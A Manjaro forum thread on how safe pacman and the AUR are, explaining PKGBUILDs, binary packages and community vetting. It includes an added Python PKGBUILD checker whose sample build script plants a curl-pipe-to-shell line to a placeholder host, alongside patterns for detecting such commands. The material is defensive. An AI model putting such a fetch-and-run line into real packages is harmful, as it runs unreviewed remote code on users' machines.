How safe is AUR and pacman in general?

Hello,

I am new to Linux so my questions might be dumb, let me apologize for that in advance.

I want to understand the philosophy of Linux (manjaro and Arch in this case) and its systems. So I have the following questions:

  1. Are packages in official repositories - pacman packages - fully open source and carefully checked by devs before getting put on pacman repositories?

  2. AUR. As far as I understand, it is a community-based repository and anyone can upload their packages there. It means that anybody can write a package and put it on AUR and that package can have malicious code in it. Am I getting this right?

Also, are packages from AUR fully open source too and anyone can inspect the code?

Hi @carpe,

I’m going to answer you as well as I can. I’m no expert, so someone can verify this or not.

AFAIK the answer to both questions is yes. And no. It’s kind of complicated, so let me try and explain:

There are the Nvidia proprietary drivers. They are, sadly, not open source. But they are in the repositories. And their installation method is open source.

The same can be done with the AUR. The AUR is more…flexible…open to outside input than the repositories, in that the AUR is community-driven. It’s actually a collection of scripts, one for each application, that tells pacman where to go get the file to install, what the necessary dependencies are, and provides the instructions for installation.

These scripts, called PKGBUILDs, are also open source and can be inspected by anyone. However, that does not mean the packages they download and install are.

I hope this makes some kind of sense. If anyone has a better way of explaining it, please tell us.

3 Likes

Start here: Arch Linux - ArchWiki

Then look at: Arch User Repository - ArchWiki

1 Like
  1. Not everything is open source; the linux-firmware package notably contains proprietary blobs for certain hardware. This usually comes from the hardware manufacturer, so you trust it as much as you trust the manufacturer.
  2. Yes. The only thing that has to be open source is the PKGBUILD, the instructions to build the package. The package itself may come from anywhere. I maintain several packages that come in binary form from the developers, such as AUR (en) - xoctave → http://www.xoctave.com/. As a community-based repo, it’s also the community’s responsibility to flag a dangerous package. Of course this could mean there will be a victim before it’s well known that the package is dangerous, but AUR maintainers and the community ain’t that slow so far.

The devs only provide a .deb package and a .zip package.

Could one say that Debian, for example, is a more secure system, because using Manjaro I have to trust someone who uploaded this package to the AUR, otherwise I cannot have it?

You can’t upload a package to AUR. You only have a PKGBUILD in AUR. Everything in AUR has to obtain the package from a source.

If you read the PKGBUILD, the source is:

source=("https://downloads.exodus.com/releases/exodus-linux-x64-${pkgver}.zip"
        "${pkgname}.svg"
        "${pkgname}.desktop"
        "LICENSE")

The package is pulled directly from the Exodus website to be built on your system.

So this is false information:

Also, you don’t have to just trust the person. You can just view the PKGBUILD and also read all of the AUR comments for your package.

6 Likes

Okay that clarified things a bit!

So AUR itself does not contain any packages, it only has a PKGBUILD which is basically an instruction on where to get the package and how to build it.

Do I get this right now?

3 Likes

Yes. There are 2 things you should pay attention to in the PKGBUILD file: what the download source URL is (usually the main developer’s site), and the PKGBUILD file in general (as it contains shell commands to build and install the package). If something seems odd (e.g. an untrustworthy source URL, or strange shell commands), don’t install the package. But so far I haven’t encountered any harmful AUR package. So there’s probably rarely any malicious stuff (if at all). It’s still good practice to always check the PKGBUILD for oddities. If you use “pacaur” to install packages from the AUR (for example), it will always offer to show you the PKGBUILD file before building/installing the package (and it defaults to yes).

1 Like

What about bin files that are already prebuilt? Is there any way to check those properly, apart from reading any pinned comments etc.?

As long as the programs from the repos are sufficient for the user, the question of the AUR will not arise. But I don’t know anyone in my Manjaro environment who doesn’t depend on builds from the AUR. So I find it all the worse that there are, e.g., outdated builds which are based on QT4, or device drivers that have long been obsolete. Before one deals with the safety of the AUR, the garbage should first be removed there, in order to create an overview. Otherwise the AUR will remain a matter of poking around in garbage for usable items. And yes, the question is who should do it.

That is why, the first time you install something from the AUR or when you enable it (I can’t remember which), you receive a warning informing you that it’s not Manjaro’s software or the responsibility of Manjaro. That you’re on your own.

And there are comments on aur.archlinux.org that verify or discredit a package. And I believe it’s effective as well.

For me, I see a flooding problem with reading stuff at Manjaro.
Before an update: read the announcements.
Before installing from the AUR: read the comments on aur.archlinux.org.
After an unsuccessful installation from the repos: read in the community what could have gone wrong.
I can well understand people for whom this is too much of an expense for a supposedly simple operating system. No offense…

None taken.

I understand completely where you’re coming from. But simple != brainless.

I really, really, really hate the “feed me with a spoon or I’m not having any” attitude some people have.

People are born with brains. They should actually use them. It opens a whole new world!

2 Likes

You could have told me more kindly that you can’t live with my opinion. I hope this remains an isolated incident. All the best :+1: :smile:

Also, the entirety of an operating system including all programs running on it can hardly be called “simple”. :wink:

In general, repositories like the default pacman package repositories or other repositories of other distros or the AUR as a user repository should already offer quite a bit of security because they are used by lots of other people, the packages are flagged, voted on, commented on, etc. There is little room for malicious uploads. Like in any repository (or “store” if you will).

Windows users are comparatively more at risk (maybe without realizing it) because they’re used to going to lots of different websites from lots of different developers or companies to download their packages from, and there’s always a chance that one of those sites might offer malicious downloads. It’s also quite “normal” that big download sites offer customized installers to include various spyware. The user has to be aware of that at all times.

Linux users have the luxury of usually getting their stuff from just one or very few places, and there’s less room for malicious packages. I think overall the risk is quite low.

But, as always: security is a process. Not a button, not a software, not a one-time-thing that you forget at some point. It’s a constant process and the user has to incorporate that into every decision he makes. That means: better to be safe than sorry. If you know bash scripts, it takes just a few seconds to go over a PKGBUILD file. And then you can sleep better at night.

6 Likes
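The two posts above (check the source= URLs, read the shell commands in the build functions, and spend the few seconds it takes to go over a PKGBUILD) plus the earlier question about prebuilt binaries can be turned into a small script. This is an added example, not code from this thread, from Manjaro, or from the AUR tooling: the PKGBUILD it inspects is a constructed sample with a hypothetical package name, placeholder hosts (example.invalid) and placeholder hashes, and the checks are heuristics a reviewer applies by hand, not a definition of “malicious”.

```python
"""Heuristic review of an AUR PKGBUILD before running makepkg (added example).

Checks: remote sources use https, sources come from the host named in url=,
a checksum array exists and covers every source, no remote source is SKIPped,
and no build function contains commands a packager should not need.
"""
import re
import shlex
from urllib.parse import urlparse

# Constructed sample (hypothetical package, placeholder hosts/hashes) with two
# planted problems: SKIP on the downloaded archive, and curl | sh in package().
SAMPLE_PKGBUILD = r"""
# Maintainer: someone <someone@example.invalid>
pkgname=examplewallet-bin
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
url="https://example.invalid"
license=('custom')
depends=('gtk3')
source=("https://downloads.example.invalid/releases/examplewallet-linux-x64-${pkgver}.zip"
        "${pkgname}.desktop"
        "LICENSE")
sha256sums=('SKIP'
            '0000000000000000000000000000000000000000000000000000000000000001'
            '0000000000000000000000000000000000000000000000000000000000000002')

package() {
  cd "$srcdir"
  install -Dm755 examplewallet "$pkgdir/usr/bin/examplewallet"
  curl -s http://telemetry.example.invalid/setup.sh | sh
}
"""

SCALAR_RE = re.compile(r'^(\w+)=(["\']?)([^"\'()\n]*)\2[ \t]*$', re.MULTILINE)
ARRAY_RE = re.compile(r'^(\w+)=\((.*?)\)', re.MULTILINE | re.DOTALL)

# Patterns that are rarely legitimate inside a PKGBUILD and always worth a look.
SUSPICIOUS = [
    (re.compile(r'\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b'), "downloads and pipes a script into a shell"),
    (re.compile(r'\bbase64\s+(-d|--decode)\b'), "decodes embedded base64 (obfuscated payload?)"),
    (re.compile(r'\beval\b'), "uses eval"),
    (re.compile(r'\bsudo\b'), "invokes sudo (a build must never need root)"),
    (re.compile(r'\$HOME\b|/home/|~/'), "touches the user's home directory"),
    (re.compile(r'\bchmod\s+([ug]\+s|[2467][0-7]{3})\b'), "sets setuid/setgid bits"),
]


def expand(value, scalars):
    """Substitute ${pkgname}/$pkgver style references from the scalar assignments."""
    return re.sub(r'\$\{(\w+)\}|\$(\w+)',
                  lambda m: scalars.get(m.group(1) or m.group(2), m.group(0)), value)


def check_pkgbuild(text):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    findings = []
    scalars = {m.group(1): m.group(3) for m in SCALAR_RE.finditer(text)}
    arrays = {m.group(1): shlex.split(m.group(2)) for m in ARRAY_RE.finditer(text)}
    sources = [expand(s, scalars) for s in arrays.get("source", [])]
    if not sources:
        findings.append("no source= array found")
    project_host = urlparse(scalars.get("url", "")).hostname

    remote = []  # indexes of sources fetched over the network
    for i, entry in enumerate(sources):
        target = entry.split("::", 1)[-1]  # makepkg allows "filename::url"
        if "://" not in target:
            continue  # local file shipped next to the PKGBUILD (desktop file, icon, ...)
        remote.append(i)
        parsed = urlparse(target)
        if parsed.scheme.split("+")[-1] != "https":  # also handles git+https
            findings.append(f"source {i}: insecure scheme '{parsed.scheme}' ({target})")
        if project_host and parsed.hostname and not parsed.hostname.endswith(project_host):
            findings.append(f"source {i}: host {parsed.hostname} differs from url= host {project_host}")

    sums = {k: v for k, v in arrays.items() if k.endswith("sums")}
    if not sums:
        findings.append("no checksum array (e.g. sha256sums=) at all")
    for name, values in sums.items():
        if len(values) != len(sources):
            findings.append(f"{name} has {len(values)} entries for {len(sources)} sources")
        for i in remote:
            if i < len(values) and values[i].upper() == "SKIP":
                findings.append(f"{name}[{i}] is SKIP: remote file {sources[i]} is never verified")

    for lineno, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # drop comments (a '#' inside quotes is rare here)
        for pattern, why in SUSPICIOUS:
            if pattern.search(code):
                findings.append(f"line {lineno}: {why}: {line.strip()}")
    return findings


if __name__ == "__main__":
    for finding in check_pkgbuild(SAMPLE_PKGBUILD):
        print("!!", finding)
```

On a real package, run this over the PKGBUILD you fetched with `git clone https://aur.archlinux.org/<pkgname>.git` before calling makepkg, and read it yourself anyway; the script only points at lines to look at. For a -bin package the checksum array is the only thing standing between you and a swapped archive on the upstream server, so a SKIP there is worth a comment on the AUR page. makepkg’s own `--verifysource` downloads and checks the sources without building, and namcap runs a much larger set of lints.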

I can live with it, just not by it, and I wasn’t trying to offend or be rude. Apologies if it came over that way.

And you too, man!

:grin:

Your assertions (and examples) that “garbage should be removed” are absolutely meaningless to that person who might need that QT4 application, or who has a ’puter from the early 00’s that needs that old driver.

Are you using python2 anywhere? If you are, when the Arch devs finally rid Arch of python2, should everything python2 in the AUR be arbitrarily deleted as well?

I just do not understand…
QT-4 support was officially discontinued by the Manjaro team with the December update. What sense does it make to continue to bet on the dead horse QT-4, especially since QT-6 is already in the starting blocks? Now to experiences with drivers from the AUR. As an example, I will name a driver from the AUR for the Epson V370 scanner. If you install it again under XFCE after the Manjaro November update, your working scanner will turn into a humming corpse that can only be reanimated with Timeshift. I mean to say that the AUR is always playing with fire and, in my experience, the slightest concerns about safety are to be seen. The number of reports of non-working software from the AUR compared to reports of potential dangers seems to confirm my experience. In conclusion, I have now given my opinion on this controversial issue.

By the way, there is always an easier answer; isn’t it?.. For all the newbies here; if you want to see whether a package is worth considering or not follow this pretty easy tip, considering you have the AUR set up on your system:

  1. Open Pamac the same way you open any other program on your chosen DE.
  2. Click on the search button on the top left of the Pamac window.
  3. Type your desired package name in the search bar. Let us use “Google Chrome” as an example.
  4. A list of packages will be presented to you. Among the first packages listed you’ll find “google-chrome 89.0.4389.90-1”. This is the current Chrome stable release for the web browser (developer, beta or open source Chromium packages might be shown before this package, among some Chromium plugins from the official repositories). Now double-click the package name.
  5. Now you’ll notice there is a page with lots of information. The ones really relevant are:
    a) The program source’s website.
    b) The package build AUR location website.
    c) First submission date.
    d) Last modified date.
    e) Votes.
  6. With all this information on hand you have all the basics to consider a package’s relevance. Obviously a long-unmaintained package is very likely prone to not work very well on your system… A rarely, if ever, voted package is prone to not be worth it as well, unless it is pretty recent. The choice is yours ultimately!..

Note: I don’t know any package system garbage free, unless it is brand new or mostly unused!.. Fortunately here in Linux, at least we have things mostly centralized right now… But again: The user has the final word!..

Have a nice day!..

I think so too.